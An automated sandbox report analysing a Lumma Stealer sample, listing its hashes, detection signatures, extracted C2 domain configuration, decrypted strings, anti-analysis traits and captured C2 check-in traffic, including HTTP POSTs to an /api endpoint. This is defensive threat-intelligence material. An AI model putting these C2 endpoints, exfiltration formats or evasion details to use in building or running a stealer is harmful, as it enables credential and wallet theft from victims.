Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1532851
MD5:3375809439f79695facbf3d39d867a8b
SHA1:76a0afc925eca3559cf1ac2f6ea075a400e23872
SHA256:06ea4b2a5e863208830bdfed5039b89fc600dfc0ca461d4afef57b331a876054
Tags:exeuser-Bitsight
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for sample
PE file contains section with special chars
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Detected potential crypto function
Entry point lies outside standard sections
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 7364 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 3375809439F79695FACBF3D39D867A8B)
    • WerFault.exe (PID: 7716 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7364 -s 1888 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 8112 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7364 -s 1940 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["clearancek.site", "bathdoomgaz.store", "spirittunek.store", "mobbipenju.store", "studennotediw.store", "licendfilteo.site", "eaglepawnoy.store", "dissapoiznw.store"], "Build id": "4SD0y4--legendaryy"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

    Sigma Signatures

    No Sigma rule has matched

    Suricata Signatures

    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-14T01:00:23.975377+020020546531A Network Trojan was detected192.168.2.749715172.67.206.204443TCP
    2024-10-14T01:00:25.168274+020020546531A Network Trojan was detected192.168.2.749721172.67.206.204443TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-14T01:00:23.975377+020020498361A Network Trojan was detected192.168.2.749715172.67.206.204443TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-14T01:00:25.168274+020020498121A Network Trojan was detected192.168.2.749721172.67.206.204443TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-14T01:00:21.690873+020020564771Domain Observed Used for C2 Detected192.168.2.7626651.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-14T01:00:21.629425+020020564711Domain Observed Used for C2 Detected192.168.2.7558791.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-14T01:00:21.668647+020020564811Domain Observed Used for C2 Detected192.168.2.7520841.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-14T01:00:21.658747+020020564831Domain Observed Used for C2 Detected192.168.2.7553641.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-14T01:00:21.713055+020020564731Domain Observed Used for C2 Detected192.168.2.7595351.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-14T01:00:21.647977+020020564851Domain Observed Used for C2 Detected192.168.2.7562391.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-14T01:00:21.702075+020020564751Domain Observed Used for C2 Detected192.168.2.7530591.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-14T01:00:21.679813+020020564791Domain Observed Used for C2 Detected192.168.2.7545811.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-14T01:00:23.196061+020028586661Domain Observed Used for C2 Detected192.168.2.749704104.102.49.254443TCP

    Joe Sandbox Signatures

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Antivirus / Scanner detection for submitted sample
    Source: file.exeAvira: detected
    Antivirus detection for URL or domain
    Source: https://steamcommunity.com/profiles/76561199724331900URL Reputation: Label: malware
    Source: https://steamcommunity.com:443/profiles/76561199724331900URL Reputation: Label: malware
    Source: https://steamcommunity.com/profiles/76561199724331900/inventory/URL Reputation: Label: malware
    Found malware configuration
    Source: file.exe.7364.0.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["clearancek.site", "bathdoomgaz.store", "spirittunek.store", "mobbipenju.store", "studennotediw.store", "licendfilteo.site", "eaglepawnoy.store", "dissapoiznw.store"], "Build id": "4SD0y4--legendaryy"}
    AI detected suspicious sample
    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
    Machine Learning detection for sample
    Source: file.exeJoe Sandbox ML: detected
    Sample uses string decryption to hide its real strings
    Source: 00000000.00000002.1578324382.0000000000651000.00000040.00000001.01000000.00000003.sdmpString decryptor: clearancek.site
    Source: 00000000.00000002.1578324382.0000000000651000.00000040.00000001.01000000.00000003.sdmpString decryptor: licendfilteo.site
    Source: 00000000.00000002.1578324382.0000000000651000.00000040.00000001.01000000.00000003.sdmpString decryptor: spirittunek.store
    Source: 00000000.00000002.1578324382.0000000000651000.00000040.00000001.01000000.00000003.sdmpString decryptor: bathdoomgaz.store
    Source: 00000000.00000002.1578324382.0000000000651000.00000040.00000001.01000000.00000003.sdmpString decryptor: studennotediw.store
    Source: 00000000.00000002.1578324382.0000000000651000.00000040.00000001.01000000.00000003.sdmpString decryptor: dissapoiznw.store
    Source: 00000000.00000002.1578324382.0000000000651000.00000040.00000001.01000000.00000003.sdmpString decryptor: eaglepawnoy.store
    Source: 00000000.00000002.1578324382.0000000000651000.00000040.00000001.01000000.00000003.sdmpString decryptor: mobbipenju.store
    Source: 00000000.00000002.1578324382.0000000000651000.00000040.00000001.01000000.00000003.sdmpString decryptor: clearancek.site
    Source: 00000000.00000002.1578324382.0000000000651000.00000040.00000001.01000000.00000003.sdmpString decryptor: lid=%s&j=%s&ver=4.0
    Source: 00000000.00000002.1578324382.0000000000651000.00000040.00000001.01000000.00000003.sdmpString decryptor: TeslaBrowser/5.5
    Source: 00000000.00000002.1578324382.0000000000651000.00000040.00000001.01000000.00000003.sdmpString decryptor: - Screen Resoluton:
    Source: 00000000.00000002.1578324382.0000000000651000.00000040.00000001.01000000.00000003.sdmpString decryptor: - Physical Installed Memory:
    Source: 00000000.00000002.1578324382.0000000000651000.00000040.00000001.01000000.00000003.sdmpString decryptor: Workgroup: -
    Source: 00000000.00000002.1578324382.0000000000651000.00000040.00000001.01000000.00000003.sdmpString decryptor: 4SD0y4--legendaryy
    Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.7:49704 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.67.206.204:443 -> 192.168.2.7:49715 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.67.206.204:443 -> 192.168.2.7:49721 version: TLS 1.2
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp]0_2_0065D110
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp]0_2_0065D110
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 53F09CFAh0_2_006999D0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp+04h]0_2_0065FCA0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [ebp-10h]0_2_00660EEC
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esi+20h]0_2_00666F91
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h0_2_0066D961
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 62429966h0_2_00693920
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edx, byte ptr [esi+edi]0_2_006549A0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], F3285E74h0_2_00694A40
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edx, byte ptr [esi+ebx]0_2_00655A50
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp eax0_2_00661A3C
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esi+04h]0_2_006642FC
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp eax0_2_00661ACD
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 53F09CFAh0_2_00699B60
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov ebp, eax0_2_0065A300
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esi+04h]0_2_00663BE2
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp+40h]0_2_00661BEE
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp+0Ch]0_2_0067C470
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov word ptr [eax], cx0_2_0066D457
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov dword ptr [esp], 00000000h0_2_0066B410
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp]0_2_00699CE0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [ebp+edx*8+00h], 9ECF05EBh0_2_00699CE0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], C85F7986h0_2_0067CCD0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp]0_2_0067CCD0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], C85F7986h0_2_0067CCD0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esi+04h]0_2_00666536
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov word ptr [eax], cx0_2_00679510
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov dword ptr [esp+1Ch], 5E46585Eh0_2_0067FD10
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx ebx, byte ptr [ecx+esi+25h]0_2_00658590
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edi, byte ptr [ecx+esi]0_2_00656EA0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx ecx, word ptr [ebp+00h]0_2_0065BEB0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp byte ptr [ebx], 00000000h0_2_00666EBF
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp+40h]0_2_00661E93
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp]0_2_00695700
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esi+20h]0_2_00666F91

    Networking

    barindex
    Suricata IDS alerts for network traffic
    Source: Network trafficSuricata IDS: 2056471 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (clearancek .site) : 192.168.2.7:55879 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056481 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dissapoiznw .store) : 192.168.2.7:52084 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056477 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bathdoomgaz .store) : 192.168.2.7:62665 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056475 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (spirittunek .store) : 192.168.2.7:53059 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056479 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (studennotediw .store) : 192.168.2.7:54581 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056485 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mobbipenju .store) : 192.168.2.7:56239 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056483 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (eaglepawnoy .store) : 192.168.2.7:55364 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056473 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (licendfilteo .site) : 192.168.2.7:59535 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.7:49704 -> 104.102.49.254:443
    Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.7:49715 -> 172.67.206.204:443
    Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49715 -> 172.67.206.204:443
    Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.7:49721 -> 172.67.206.204:443
    Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49721 -> 172.67.206.204:443
    C2 URLs / IPs found in malware configuration
    Source: Malware configuration extractorURLs: clearancek.site
    Source: Malware configuration extractorURLs: bathdoomgaz.store
    Source: Malware configuration extractorURLs: spirittunek.store
    Source: Malware configuration extractorURLs: mobbipenju.store
    Source: Malware configuration extractorURLs: studennotediw.store
    Source: Malware configuration extractorURLs: licendfilteo.site
    Source: Malware configuration extractorURLs: eaglepawnoy.store
    Source: Malware configuration extractorURLs: dissapoiznw.store
    Source: Joe Sandbox ViewIP Address: 104.102.49.254 104.102.49.254
    Source: Joe Sandbox ViewIP Address: 172.67.206.204 172.67.206.204
    Source: Joe Sandbox ViewASN Name: AKAMAI-ASUS AKAMAI-ASUS
    Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
    Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
    Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: sergei-esenin.com
    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=K6lOIIoT178VADmpH2iwMP7nsotQSL75jipN8qhG5Ck-1728860423-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 52Host: sergei-esenin.com
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
    Source: file.exe, 00000000.00000003.1330730368.00000000011EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
    Source: file.exe, 00000000.00000003.1330730368.00000000011EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=Nonesessionid=58872c358a22b992a1a0cbb4; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type34837Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveSun, 13 Oct 2024 23:00:23 GMTDateProxy-ConnectioncloseConnectionno-cacheCache-Controlration1>! equals www.youtube.com (Youtube)
    Source: file.exe, 00000000.00000003.1330730368.00000000011EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
    Source: global trafficDNS traffic detected: DNS query: clearancek.site
    Source: global trafficDNS traffic detected: DNS query: mobbipenju.store
    Source: global trafficDNS traffic detected: DNS query: eaglepawnoy.store
    Source: global trafficDNS traffic detected: DNS query: dissapoiznw.store
    Source: global trafficDNS traffic detected: DNS query: studennotediw.store
    Source: global trafficDNS traffic detected: DNS query: bathdoomgaz.store
    Source: global trafficDNS traffic detected: DNS query: spirittunek.store
    Source: global trafficDNS traffic detected: DNS query: licendfilteo.site
    Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
    Source: global trafficDNS traffic detected: DNS query: sergei-esenin.com
    Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: sergei-esenin.com
    Source: file.exe, 00000000.00000003.1330730368.00000000011EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:27060
    Source: file.exe, 00000000.00000003.1330730368.00000000011EF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1330730368.00000000011F8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1337224103.0000000001201000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1330764696.0000000001196000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
    Source: file.exe, 00000000.00000003.1330730368.00000000011EF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1330730368.00000000011F8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1337224103.0000000001201000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1330764696.0000000001196000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/privacy_agreement/
    Source: file.exe, 00000000.00000003.1330730368.00000000011EF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1330730368.00000000011F8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1337224103.0000000001201000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1330764696.0000000001196000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
    Source: Amcache.hve.5.drString found in binary or memory: http://upx.sf.net
    Source: file.exe, 00000000.00000003.1330730368.00000000011F8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1337224103.0000000001201000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.valvesoftware.com/legal.htm
    Source: file.exe, 00000000.00000003.1330730368.00000000011EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.steampowered.com/
    Source: file.exe, 00000000.00000003.1330730368.00000000011EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avatars.akamai.steamstatic
    Source: file.exe, 00000000.00000003.1337224103.0000000001201000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1330764696.0000000001196000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
    Source: file.exe, 00000000.00000003.1330730368.00000000011EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://broadcast.st.dl.eccdnx.com
    Source: file.exe, 00000000.00000003.1330730368.00000000011EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/
    Source: file.exe, 00000000.00000003.1330730368.00000000011EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://checkout.steampowered.com/
    Source: file.exe, 00000000.00000003.1330764696.0000000001196000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clearancek.site:443/api
    Source: file.exe, 00000000.00000003.1330730368.00000000011EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/
    Source: file.exe, 00000000.00000003.1330730368.00000000011EF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1330730368.00000000011F8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1337224103.0000000001201000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1330764696.0000000001196000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=2Ih2WOq7ErXY&a
    Source: file.exe, 00000000.00000003.1330730368.00000000011F8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1337224103.0000000001201000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english
    Source: file.exe, 00000000.00000003.1330730368.00000000011EF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1330730368.00000000011F8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1337224103.0000000001201000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp
    Source: file.exe, 00000000.00000003.1330730368.00000000011EF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1330730368.00000000011F8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1337224103.0000000001201000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english
    Source: file.exe, 00000000.00000003.1330730368.00000000011EF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1330730368.00000000011F8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1337224103.0000000001201000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1
